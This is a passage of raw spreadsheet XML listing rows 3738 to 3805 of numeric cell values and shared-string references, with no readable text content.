      </c>
      <c r="D3738" s="2">
        <v>1.0</v>
      </c>
      <c r="E3738" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3738" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="3739" ht="15.75" customHeight="1">
      <c r="A3739" s="1">
        <v>5884.0</v>
      </c>
      <c r="B3739" s="2">
        <v>4.7073493E7</v>
      </c>
      <c r="C3739" s="2" t="s">
        <v>3538</v>
      </c>
      <c r="D3739" s="2">
        <v>1.0</v>
      </c>
      <c r="E3739" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3739" s="2">
        <v>0.1161616161616162</v>
      </c>
    </row>
    <row r="3740" ht="15.75" customHeight="1">
      <c r="A3740" s="1">
        <v>14462.0</v>
      </c>
      <c r="B3740" s="2">
        <v>3.9477836E7</v>
      </c>
      <c r="C3740" s="2" t="s">
        <v>3539</v>
      </c>
      <c r="D3740" s="2">
        <v>1.0</v>
      </c>
      <c r="E3740" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3740" s="2">
        <v>0.1161616161616162</v>
      </c>
    </row>
    <row r="3741" ht="15.75" customHeight="1">
      <c r="A3741" s="1">
        <v>2998.0</v>
      </c>
      <c r="B3741" s="2">
        <v>3.6286698E7</v>
      </c>
      <c r="C3741" s="2" t="s">
        <v>3540</v>
      </c>
      <c r="D3741" s="2">
        <v>1.0</v>
      </c>
      <c r="E3741" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3741" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="3742" ht="15.75" customHeight="1">
      <c r="A3742" s="1">
        <v>3324.0</v>
      </c>
      <c r="B3742" s="2">
        <v>3.7666719E7</v>
      </c>
      <c r="C3742" s="2" t="s">
        <v>3541</v>
      </c>
      <c r="D3742" s="2">
        <v>1.0</v>
      </c>
      <c r="E3742" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3742" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="3743" ht="15.75" customHeight="1">
      <c r="A3743" s="1">
        <v>10228.0</v>
      </c>
      <c r="B3743" s="2">
        <v>5.7482511E7</v>
      </c>
      <c r="C3743" s="2" t="s">
        <v>3542</v>
      </c>
      <c r="D3743" s="2">
        <v>1.0</v>
      </c>
      <c r="E3743" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3743" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="3744" ht="15.75" customHeight="1">
      <c r="A3744" s="1">
        <v>11824.0</v>
      </c>
      <c r="B3744" s="2">
        <v>2.4636493E7</v>
      </c>
      <c r="C3744" s="2" t="s">
        <v>3543</v>
      </c>
      <c r="D3744" s="2">
        <v>1.0</v>
      </c>
      <c r="E3744" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3744" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="3745" ht="15.75" customHeight="1">
      <c r="A3745" s="1">
        <v>3807.0</v>
      </c>
      <c r="B3745" s="2">
        <v>4.0040152E7</v>
      </c>
      <c r="C3745" s="2" t="s">
        <v>3544</v>
      </c>
      <c r="D3745" s="2">
        <v>1.0</v>
      </c>
      <c r="E3745" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3745" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="3746" ht="15.75" customHeight="1">
      <c r="A3746" s="1">
        <v>10084.0</v>
      </c>
      <c r="B3746" s="2">
        <v>5.7162833E7</v>
      </c>
      <c r="C3746" s="2" t="s">
        <v>3545</v>
      </c>
      <c r="D3746" s="2">
        <v>1.0</v>
      </c>
      <c r="E3746" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3746" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="3747" ht="15.75" customHeight="1">
      <c r="A3747" s="1">
        <v>30378.0</v>
      </c>
      <c r="B3747" s="2">
        <v>3.8487294E7</v>
      </c>
      <c r="C3747" s="2" t="s">
        <v>3546</v>
      </c>
      <c r="D3747" s="2">
        <v>1.0</v>
      </c>
      <c r="E3747" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3747" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="3748" ht="15.75" customHeight="1">
      <c r="A3748" s="1">
        <v>4330.0</v>
      </c>
      <c r="B3748" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C3748" s="2" t="s">
        <v>3547</v>
      </c>
      <c r="D3748" s="2">
        <v>1.0</v>
      </c>
      <c r="E3748" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3748" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3749" ht="15.75" customHeight="1">
      <c r="A3749" s="1">
        <v>7661.0</v>
      </c>
      <c r="B3749" s="2">
        <v>5.1813958E7</v>
      </c>
      <c r="C3749" s="2" t="s">
        <v>3548</v>
      </c>
      <c r="D3749" s="2">
        <v>1.0</v>
      </c>
      <c r="E3749" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3749" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3750" ht="15.75" customHeight="1">
      <c r="A3750" s="1">
        <v>9471.0</v>
      </c>
      <c r="B3750" s="2">
        <v>5.5864558E7</v>
      </c>
      <c r="C3750" s="2" t="s">
        <v>3549</v>
      </c>
      <c r="D3750" s="2">
        <v>1.0</v>
      </c>
      <c r="E3750" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3750" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3751" ht="15.75" customHeight="1">
      <c r="A3751" s="1">
        <v>12746.0</v>
      </c>
      <c r="B3751" s="2">
        <v>3.110494E7</v>
      </c>
      <c r="C3751" s="2" t="s">
        <v>3550</v>
      </c>
      <c r="D3751" s="2">
        <v>1.0</v>
      </c>
      <c r="E3751" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3751" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3752" ht="15.75" customHeight="1">
      <c r="A3752" s="1">
        <v>17624.0</v>
      </c>
      <c r="B3752" s="2">
        <v>5.0377832E7</v>
      </c>
      <c r="C3752" s="2" t="s">
        <v>3551</v>
      </c>
      <c r="D3752" s="2">
        <v>1.0</v>
      </c>
      <c r="E3752" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3752" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3753" ht="15.75" customHeight="1">
      <c r="A3753" s="1">
        <v>17886.0</v>
      </c>
      <c r="B3753" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C3753" s="2" t="s">
        <v>3552</v>
      </c>
      <c r="D3753" s="2">
        <v>1.0</v>
      </c>
      <c r="E3753" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3753" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="3754" ht="15.75" customHeight="1">
      <c r="A3754" s="1">
        <v>2805.0</v>
      </c>
      <c r="B3754" s="2">
        <v>3.5347042E7</v>
      </c>
      <c r="C3754" s="2" t="s">
        <v>3553</v>
      </c>
      <c r="D3754" s="2">
        <v>1.0</v>
      </c>
      <c r="E3754" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3754" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3755" ht="15.75" customHeight="1">
      <c r="A3755" s="1">
        <v>4349.0</v>
      </c>
      <c r="B3755" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C3755" s="2" t="s">
        <v>3173</v>
      </c>
      <c r="D3755" s="2">
        <v>1.0</v>
      </c>
      <c r="E3755" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3755" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3756" ht="15.75" customHeight="1">
      <c r="A3756" s="1">
        <v>7176.0</v>
      </c>
      <c r="B3756" s="2">
        <v>5.05568E7</v>
      </c>
      <c r="C3756" s="2" t="s">
        <v>3554</v>
      </c>
      <c r="D3756" s="2">
        <v>1.0</v>
      </c>
      <c r="E3756" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3756" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3757" ht="15.75" customHeight="1">
      <c r="A3757" s="1">
        <v>7297.0</v>
      </c>
      <c r="B3757" s="2">
        <v>5.0833796E7</v>
      </c>
      <c r="C3757" s="2" t="s">
        <v>3555</v>
      </c>
      <c r="D3757" s="2">
        <v>1.0</v>
      </c>
      <c r="E3757" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3757" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3758" ht="15.75" customHeight="1">
      <c r="A3758" s="1">
        <v>9048.0</v>
      </c>
      <c r="B3758" s="2">
        <v>5.5061036E7</v>
      </c>
      <c r="C3758" s="2" t="s">
        <v>3556</v>
      </c>
      <c r="D3758" s="2">
        <v>1.0</v>
      </c>
      <c r="E3758" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3758" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3759" ht="15.75" customHeight="1">
      <c r="A3759" s="1">
        <v>11493.0</v>
      </c>
      <c r="B3759" s="2">
        <v>2.2064175E7</v>
      </c>
      <c r="C3759" s="2" t="s">
        <v>3557</v>
      </c>
      <c r="D3759" s="2">
        <v>1.0</v>
      </c>
      <c r="E3759" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3759" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3760" ht="15.75" customHeight="1">
      <c r="A3760" s="1">
        <v>15970.0</v>
      </c>
      <c r="B3760" s="2">
        <v>4.4833429E7</v>
      </c>
      <c r="C3760" s="2" t="s">
        <v>3558</v>
      </c>
      <c r="D3760" s="2">
        <v>1.0</v>
      </c>
      <c r="E3760" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3760" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3761" ht="15.75" customHeight="1">
      <c r="A3761" s="1">
        <v>17334.0</v>
      </c>
      <c r="B3761" s="2">
        <v>4.9383634E7</v>
      </c>
      <c r="C3761" s="2" t="s">
        <v>3559</v>
      </c>
      <c r="D3761" s="2">
        <v>1.0</v>
      </c>
      <c r="E3761" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3761" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="3762" ht="15.75" customHeight="1">
      <c r="A3762" s="1">
        <v>31161.0</v>
      </c>
      <c r="B3762" s="2">
        <v>4903884.0</v>
      </c>
      <c r="C3762" s="2" t="s">
        <v>3560</v>
      </c>
      <c r="D3762" s="2">
        <v>1.0</v>
      </c>
      <c r="E3762" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3762" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="3763" ht="15.75" customHeight="1">
      <c r="A3763" s="1">
        <v>7917.0</v>
      </c>
      <c r="B3763" s="2">
        <v>5.2508222E7</v>
      </c>
      <c r="C3763" s="2" t="s">
        <v>3561</v>
      </c>
      <c r="D3763" s="2">
        <v>1.0</v>
      </c>
      <c r="E3763" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3763" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3764" ht="15.75" customHeight="1">
      <c r="A3764" s="1">
        <v>12258.0</v>
      </c>
      <c r="B3764" s="2">
        <v>2.7999948E7</v>
      </c>
      <c r="C3764" s="2" t="s">
        <v>3562</v>
      </c>
      <c r="D3764" s="2">
        <v>1.0</v>
      </c>
      <c r="E3764" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3764" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3765" ht="15.75" customHeight="1">
      <c r="A3765" s="1">
        <v>14351.0</v>
      </c>
      <c r="B3765" s="2">
        <v>3.8907487E7</v>
      </c>
      <c r="C3765" s="2" t="s">
        <v>3563</v>
      </c>
      <c r="D3765" s="2">
        <v>1.0</v>
      </c>
      <c r="E3765" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3765" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3766" ht="15.75" customHeight="1">
      <c r="A3766" s="1">
        <v>15207.0</v>
      </c>
      <c r="B3766" s="2">
        <v>4.2131383E7</v>
      </c>
      <c r="C3766" s="2" t="s">
        <v>3564</v>
      </c>
      <c r="D3766" s="2">
        <v>1.0</v>
      </c>
      <c r="E3766" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3766" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3767" ht="15.75" customHeight="1">
      <c r="A3767" s="1">
        <v>19944.0</v>
      </c>
      <c r="B3767" s="2">
        <v>5.7466928E7</v>
      </c>
      <c r="C3767" s="2" t="s">
        <v>3565</v>
      </c>
      <c r="D3767" s="2">
        <v>1.0</v>
      </c>
      <c r="E3767" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3767" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3768" ht="15.75" customHeight="1">
      <c r="A3768" s="1">
        <v>21662.0</v>
      </c>
      <c r="B3768" s="2">
        <v>2.5006278E7</v>
      </c>
      <c r="C3768" s="2" t="s">
        <v>3566</v>
      </c>
      <c r="D3768" s="2">
        <v>1.0</v>
      </c>
      <c r="E3768" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3768" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="3769" ht="15.75" customHeight="1">
      <c r="A3769" s="1">
        <v>6771.0</v>
      </c>
      <c r="B3769" s="2">
        <v>4.9435849E7</v>
      </c>
      <c r="C3769" s="2" t="s">
        <v>3567</v>
      </c>
      <c r="D3769" s="2">
        <v>1.0</v>
      </c>
      <c r="E3769" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3769" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="3770" ht="15.75" customHeight="1">
      <c r="A3770" s="1">
        <v>10848.0</v>
      </c>
      <c r="B3770" s="2">
        <v>1.6180135E7</v>
      </c>
      <c r="C3770" s="2" t="s">
        <v>3568</v>
      </c>
      <c r="D3770" s="2">
        <v>1.0</v>
      </c>
      <c r="E3770" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3770" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="3771" ht="15.75" customHeight="1">
      <c r="A3771" s="1">
        <v>17890.0</v>
      </c>
      <c r="B3771" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C3771" s="2" t="s">
        <v>3569</v>
      </c>
      <c r="D3771" s="2">
        <v>1.0</v>
      </c>
      <c r="E3771" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3771" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="3772" ht="15.75" customHeight="1">
      <c r="A3772" s="1">
        <v>11620.0</v>
      </c>
      <c r="B3772" s="2">
        <v>2.3095919E7</v>
      </c>
      <c r="C3772" s="2" t="s">
        <v>3570</v>
      </c>
      <c r="D3772" s="2">
        <v>1.0</v>
      </c>
      <c r="E3772" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3772" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="3773" ht="15.75" customHeight="1">
      <c r="A3773" s="1">
        <v>10535.0</v>
      </c>
      <c r="B3773" s="2">
        <v>1.2354537E7</v>
      </c>
      <c r="C3773" s="2" t="s">
        <v>3571</v>
      </c>
      <c r="D3773" s="2">
        <v>1.0</v>
      </c>
      <c r="E3773" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3773" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="3774" ht="15.75" customHeight="1">
      <c r="A3774" s="1">
        <v>11882.0</v>
      </c>
      <c r="B3774" s="2">
        <v>2.5085341E7</v>
      </c>
      <c r="C3774" s="2" t="s">
        <v>3572</v>
      </c>
      <c r="D3774" s="2">
        <v>1.0</v>
      </c>
      <c r="E3774" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3774" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="3775" ht="15.75" customHeight="1">
      <c r="A3775" s="1">
        <v>19897.0</v>
      </c>
      <c r="B3775" s="2">
        <v>5.7308839E7</v>
      </c>
      <c r="C3775" s="2" t="s">
        <v>3573</v>
      </c>
      <c r="D3775" s="2">
        <v>1.0</v>
      </c>
      <c r="E3775" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3775" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="3776" ht="15.75" customHeight="1">
      <c r="A3776" s="1">
        <v>1204.0</v>
      </c>
      <c r="B3776" s="2">
        <v>2.4822452E7</v>
      </c>
      <c r="C3776" s="2" t="s">
        <v>3574</v>
      </c>
      <c r="D3776" s="2">
        <v>1.0</v>
      </c>
      <c r="E3776" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3776" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3777" ht="15.75" customHeight="1">
      <c r="A3777" s="1">
        <v>4958.0</v>
      </c>
      <c r="B3777" s="2">
        <v>4.4068779E7</v>
      </c>
      <c r="C3777" s="2" t="s">
        <v>3575</v>
      </c>
      <c r="D3777" s="2">
        <v>1.0</v>
      </c>
      <c r="E3777" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3777" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3778" ht="15.75" customHeight="1">
      <c r="A3778" s="1">
        <v>15548.0</v>
      </c>
      <c r="B3778" s="2">
        <v>4.3398436E7</v>
      </c>
      <c r="C3778" s="2" t="s">
        <v>3576</v>
      </c>
      <c r="D3778" s="2">
        <v>1.0</v>
      </c>
      <c r="E3778" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3778" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3779" ht="15.75" customHeight="1">
      <c r="A3779" s="1">
        <v>16451.0</v>
      </c>
      <c r="B3779" s="2">
        <v>4.6419481E7</v>
      </c>
      <c r="C3779" s="2" t="s">
        <v>3577</v>
      </c>
      <c r="D3779" s="2">
        <v>1.0</v>
      </c>
      <c r="E3779" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3779" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3780" ht="15.75" customHeight="1">
      <c r="A3780" s="1">
        <v>23998.0</v>
      </c>
      <c r="B3780" s="2">
        <v>9233432.0</v>
      </c>
      <c r="C3780" s="2" t="s">
        <v>3578</v>
      </c>
      <c r="D3780" s="2">
        <v>1.0</v>
      </c>
      <c r="E3780" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3780" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3781" ht="15.75" customHeight="1">
      <c r="A3781" s="1">
        <v>28620.0</v>
      </c>
      <c r="B3781" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C3781" s="2" t="s">
        <v>3579</v>
      </c>
      <c r="D3781" s="2">
        <v>1.0</v>
      </c>
      <c r="E3781" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3781" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3782" ht="15.75" customHeight="1">
      <c r="A3782" s="1">
        <v>33730.0</v>
      </c>
      <c r="B3782" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C3782" s="2" t="s">
        <v>3580</v>
      </c>
      <c r="D3782" s="2">
        <v>1.0</v>
      </c>
      <c r="E3782" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3782" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="3783" ht="15.75" customHeight="1">
      <c r="A3783" s="1">
        <v>16456.0</v>
      </c>
      <c r="B3783" s="2">
        <v>4.6444324E7</v>
      </c>
      <c r="C3783" s="2" t="s">
        <v>3581</v>
      </c>
      <c r="D3783" s="2">
        <v>1.0</v>
      </c>
      <c r="E3783" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3783" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="3784" ht="15.75" customHeight="1">
      <c r="A3784" s="1">
        <v>3475.0</v>
      </c>
      <c r="B3784" s="2">
        <v>3.8364585E7</v>
      </c>
      <c r="C3784" s="2" t="s">
        <v>3582</v>
      </c>
      <c r="D3784" s="2">
        <v>1.0</v>
      </c>
      <c r="E3784" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3784" s="2">
        <v>0.1150234741784038</v>
      </c>
    </row>
    <row r="3785" ht="15.75" customHeight="1">
      <c r="A3785" s="1">
        <v>4015.0</v>
      </c>
      <c r="B3785" s="2">
        <v>4.0922871E7</v>
      </c>
      <c r="C3785" s="2" t="s">
        <v>3583</v>
      </c>
      <c r="D3785" s="2">
        <v>1.0</v>
      </c>
      <c r="E3785" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3785" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="3786" ht="15.75" customHeight="1">
      <c r="A3786" s="1">
        <v>13850.0</v>
      </c>
      <c r="B3786" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C3786" s="2" t="s">
        <v>3584</v>
      </c>
      <c r="D3786" s="2">
        <v>1.0</v>
      </c>
      <c r="E3786" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3786" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="3787" ht="15.75" customHeight="1">
      <c r="A3787" s="1">
        <v>13851.0</v>
      </c>
      <c r="B3787" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C3787" s="2" t="s">
        <v>3456</v>
      </c>
      <c r="D3787" s="2">
        <v>1.0</v>
      </c>
      <c r="E3787" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3787" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="3788" ht="15.75" customHeight="1">
      <c r="A3788" s="1">
        <v>14266.0</v>
      </c>
      <c r="B3788" s="2">
        <v>3.840275E7</v>
      </c>
      <c r="C3788" s="2" t="s">
        <v>3585</v>
      </c>
      <c r="D3788" s="2">
        <v>1.0</v>
      </c>
      <c r="E3788" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3788" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="3789" ht="15.75" customHeight="1">
      <c r="A3789" s="1">
        <v>16208.0</v>
      </c>
      <c r="B3789" s="2">
        <v>4.5687427E7</v>
      </c>
      <c r="C3789" s="2" t="s">
        <v>3586</v>
      </c>
      <c r="D3789" s="2">
        <v>1.0</v>
      </c>
      <c r="E3789" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3789" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="3790" ht="15.75" customHeight="1">
      <c r="A3790" s="1">
        <v>1727.0</v>
      </c>
      <c r="B3790" s="2">
        <v>2.872969E7</v>
      </c>
      <c r="C3790" s="2" t="s">
        <v>3587</v>
      </c>
      <c r="D3790" s="2">
        <v>1.0</v>
      </c>
      <c r="E3790" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3790" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3791" ht="15.75" customHeight="1">
      <c r="A3791" s="1">
        <v>3799.0</v>
      </c>
      <c r="B3791" s="2">
        <v>3.9980024E7</v>
      </c>
      <c r="C3791" s="2" t="s">
        <v>3588</v>
      </c>
      <c r="D3791" s="2">
        <v>1.0</v>
      </c>
      <c r="E3791" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3791" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3792" ht="15.75" customHeight="1">
      <c r="A3792" s="1">
        <v>4041.0</v>
      </c>
      <c r="B3792" s="2">
        <v>4.1041287E7</v>
      </c>
      <c r="C3792" s="2" t="s">
        <v>3589</v>
      </c>
      <c r="D3792" s="2">
        <v>1.0</v>
      </c>
      <c r="E3792" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3792" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3793" ht="15.75" customHeight="1">
      <c r="A3793" s="1">
        <v>4042.0</v>
      </c>
      <c r="B3793" s="2">
        <v>4.1041287E7</v>
      </c>
      <c r="C3793" s="2" t="s">
        <v>3590</v>
      </c>
      <c r="D3793" s="2">
        <v>1.0</v>
      </c>
      <c r="E3793" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3793" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3794" ht="15.75" customHeight="1">
      <c r="A3794" s="1">
        <v>5895.0</v>
      </c>
      <c r="B3794" s="2">
        <v>4.7098851E7</v>
      </c>
      <c r="C3794" s="2" t="s">
        <v>3591</v>
      </c>
      <c r="D3794" s="2">
        <v>1.0</v>
      </c>
      <c r="E3794" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3794" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3795" ht="15.75" customHeight="1">
      <c r="A3795" s="1">
        <v>5982.0</v>
      </c>
      <c r="B3795" s="2">
        <v>4.7396466E7</v>
      </c>
      <c r="C3795" s="2" t="s">
        <v>3592</v>
      </c>
      <c r="D3795" s="2">
        <v>1.0</v>
      </c>
      <c r="E3795" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3795" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3796" ht="15.75" customHeight="1">
      <c r="A3796" s="1">
        <v>7530.0</v>
      </c>
      <c r="B3796" s="2">
        <v>5.1457893E7</v>
      </c>
      <c r="C3796" s="2" t="s">
        <v>3593</v>
      </c>
      <c r="D3796" s="2">
        <v>1.0</v>
      </c>
      <c r="E3796" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3796" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3797" ht="15.75" customHeight="1">
      <c r="A3797" s="1">
        <v>7556.0</v>
      </c>
      <c r="B3797" s="2">
        <v>5.1539099E7</v>
      </c>
      <c r="C3797" s="2" t="s">
        <v>3594</v>
      </c>
      <c r="D3797" s="2">
        <v>1.0</v>
      </c>
      <c r="E3797" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3797" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3798" ht="15.75" customHeight="1">
      <c r="A3798" s="1">
        <v>7784.0</v>
      </c>
      <c r="B3798" s="2">
        <v>5.2191357E7</v>
      </c>
      <c r="C3798" s="2" t="s">
        <v>3595</v>
      </c>
      <c r="D3798" s="2">
        <v>1.0</v>
      </c>
      <c r="E3798" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3798" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3799" ht="15.75" customHeight="1">
      <c r="A3799" s="1">
        <v>8488.0</v>
      </c>
      <c r="B3799" s="2">
        <v>5.404336E7</v>
      </c>
      <c r="C3799" s="2" t="s">
        <v>3596</v>
      </c>
      <c r="D3799" s="2">
        <v>1.0</v>
      </c>
      <c r="E3799" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3799" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3800" ht="15.75" customHeight="1">
      <c r="A3800" s="1">
        <v>9767.0</v>
      </c>
      <c r="B3800" s="2">
        <v>5.6499611E7</v>
      </c>
      <c r="C3800" s="2" t="s">
        <v>3597</v>
      </c>
      <c r="D3800" s="2">
        <v>1.0</v>
      </c>
      <c r="E3800" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3800" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3801" ht="15.75" customHeight="1">
      <c r="A3801" s="1">
        <v>10012.0</v>
      </c>
      <c r="B3801" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C3801" s="2" t="s">
        <v>3598</v>
      </c>
      <c r="D3801" s="2">
        <v>1.0</v>
      </c>
      <c r="E3801" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3801" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3802" ht="15.75" customHeight="1">
      <c r="A3802" s="1">
        <v>10013.0</v>
      </c>
      <c r="B3802" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C3802" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="D3802" s="2">
        <v>1.0</v>
      </c>
      <c r="E3802" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3802" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3803" ht="15.75" customHeight="1">
      <c r="A3803" s="1">
        <v>10014.0</v>
      </c>
      <c r="B3803" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C3803" s="2" t="s">
        <v>3599</v>
      </c>
      <c r="D3803" s="2">
        <v>1.0</v>
      </c>
      <c r="E3803" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3803" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3804" ht="15.75" customHeight="1">
      <c r="A3804" s="1">
        <v>10016.0</v>
      </c>
      <c r="B3804" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C3804" s="2" t="s">
        <v>3600</v>
      </c>
      <c r="D3804" s="2">
        <v>1.0</v>
      </c>
      <c r="E3804" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3804" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="3805" ht="15.75" customHeight="1">
      <c r="A3805" s="1">
        <v>10211.0</v>
      </c>
      <c r="B3805" s="2">
        <v>5.7430102E7</v>
      </c>
      <c r="C3805" s="2" t="s">
        <v>3601</v>
      </c>
